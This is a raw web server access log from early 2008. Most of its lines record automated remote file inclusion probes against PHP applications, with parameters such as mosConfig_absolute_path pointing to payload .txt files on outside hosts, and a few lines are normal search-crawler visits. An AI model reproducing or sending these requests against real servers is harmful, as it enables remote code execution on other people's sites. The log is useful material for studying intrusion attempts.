58.65.169.46 - - [17/Feb/2008:06:38:41 -0800] "GET /logs/access_080120.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.39.130.213 - - [17/Feb/2008:06:39:16 -0800] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://apm-3.ru/style/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:06:39:44 -0800] "GET /logs/access_080131.log//vbgsitemap/vbgsitemap-config.php?base=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:06:39:44 -0800] "GET //vbgsitemap/vbgsitemap-config.php?base=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:06:39:44 -0800] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:06:39:44 -0800] "GET /logs/access_080131.log//vbgsitemap/vbgsitemap-vbseo.php?base=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:06:39:45 -0800] "GET //vbgsitemap/vbgsitemap-vbseo.php?base=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:06:39:45 -0800] "GET /logs//vbgsitemap/vbgsitemap-vbseo.php?base=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.239.6.64 - - [17/Feb/2008:06:41:10 -0800] "GET /logs/access_080108.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.239.6.64 - - [17/Feb/2008:06:41:10 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.239.6.64 - - [17/Feb/2008:06:41:11 -0800] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.70.36.184 - - [17/Feb/2008:06:42:22 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Jyxobot/1" "www.dmulk.com"
195.70.36.184 - - [17/Feb/2008:06:42:34 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Jyxobot/1" "www.dmulk.com"
67.15.12.20 - - [17/Feb/2008:06:43:00 -0800] "GET /logs//index.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.15.12.20 - - [17/Feb/2008:06:43:05 -0800] "GET //index.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:06:43:33 -0800] "GET /logs/access_080201.log//vbgsitemap/vbgsitemap-vbseo.php?base=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:06:43:44 -0800] "GET /logs/access_080201.log//vbgsitemap/vbgsitemap-config.php?base=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.104.169 - - [17/Feb/2008:06:45:41 -0800] "GET /logs/access_080104.log HTTP/1.1" 200 65536 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.104.169 - - [17/Feb/2008:06:45:41 -0800] "GET /logs/access_070915.log HTTP/1.1" 200 65779 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.104.169 - - [17/Feb/2008:06:45:41 -0800] "GET /logs/access_071030.log HTTP/1.1" 200 28194 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:06:48:03 -0800] "GET /logs/access_080201.log///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:06:48:04 -0800] "GET ///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.103 - - [17/Feb/2008:06:48:05 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.103 - - [17/Feb/2008:06:48:06 -0800] "GET /bikes/CreSTOC07/?D=A HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:06:48:09 -0800] "GET /logs///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:06:50:08 -0800] "GET /logs//index1.php?pagina=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:06:50:08 -0800] "GET //index1.php?pagina=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
90.185.233.233 - - [17/Feb/2008:06:50:15 -0800] "GET //index1.php?pagina=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
90.185.233.233 - - [17/Feb/2008:06:50:15 -0800] "GET /logs//index1.php?pagina=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:06:50:28 -0800] "GET /logs/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:06:50:29 -0800] "GET /index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:25 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:26 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:26 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:26 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:26 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:26 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:27 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:27 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:27 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:29 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:29 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:30 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:33 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:34 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:34 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:36 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:36 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:36 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:36 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:37 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:38 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:38 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:40 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:40 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:41 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:41 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:45 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:51:53 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:52:16 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:52:16 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:52:16 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:52:18 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:52:20 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:52:22 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [17/Feb/2008:06:52:22 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.159.204.29 - - [17/Feb/2008:06:53:15 -0800] "GET /logs/access_080122.log//index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.159.204.29 - - [17/Feb/2008:06:53:25 -0800] "GET //index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.159.204.29 - - [17/Feb/2008:06:53:30 -0800] "GET /logs//index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:06:53:51 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:06:53:51 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:06:53:52 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.87.87.17 - - [17/Feb/2008:06:54:12 -0800] "GET /logs/bughttp://www.granadoconsultoria.com.br/cache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
198.87.87.17 - - [17/Feb/2008:06:54:12 -0800] "GET /bughttp://www.granadoconsultoria.com.br/cache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
208.116.41.19 - - [17/Feb/2008:06:55:23 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:06:56:14 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [17/Feb/2008:06:56:54 -0800] "GET //cyberfolio/portfolio/msg/view.php?av=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.135.207.90 - - [17/Feb/2008:06:57:05 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.239.6.64 - - [17/Feb/2008:06:57:27 -0800] "GET /logs/access_080105.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:06:58:11 -0800] "GET /logs/access.log//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:06:58:27 -0800] "GET /logs/access.log//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.39.130.213 - - [17/Feb/2008:06:59:18 -0800] "GET /logs/access_080130.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://apm-3.ru/style/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.39.130.213 - - [17/Feb/2008:06:59:18 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://apm-3.ru/style/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.39.130.213 - - [17/Feb/2008:06:59:24 -0800] "GET /logs/access_080103.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://apm-3.ru/style/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.236.106 - - [17/Feb/2008:06:59:32 -0800] "GET /index.php?sub=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:02:41 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:02:42 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:02:45 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:07:02:49 -0800] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://checkitoutrenoir.free.fr/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:07:02:51 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://checkitoutrenoir.free.fr/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:03:47 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:03:47 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:03:51 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:07:05:22 -0800] "GET /logs/access_080108.log//tools/send_reminders.php?noSet=0&includedir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:07:05:22 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:07:05:22 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:07:05:28 -0800] "GET /logs/access_080118.log/index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:07:05:28 -0800] "GET /index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:07:05:29 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.184.180 - - [17/Feb/2008:07:06:11 -0800] "GET /logs/access_080121.log//cyberfolio/portfolio/msg/view.php?av=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [17/Feb/2008:07:06:11 -0800] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:07:06:12 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.87.87.17 - - [17/Feb/2008:07:06:14 -0800] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.skpersonal.de/templates/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.87.87.17 - - [17/Feb/2008:07:06:15 -0800] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.skpersonal.de/templates/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [17/Feb/2008:07:06:49 -0800] "GET /logs/access.log//cyberfolio/portfolio/msg/view.php?av=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:07:28 -0800] "GET /logs/access_080117.log///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:07:07:46 -0800] "GET /logs/access.log//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:07:08:01 -0800] "GET //components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:07:08:02 -0800] "GET /logs//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:07:08:14 -0800] "GET //index.php?pag=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:07:08:14 -0800] "GET /logs//index.php?pag=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:07:08:19 -0800] "GET /logs/access_071230.log/index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
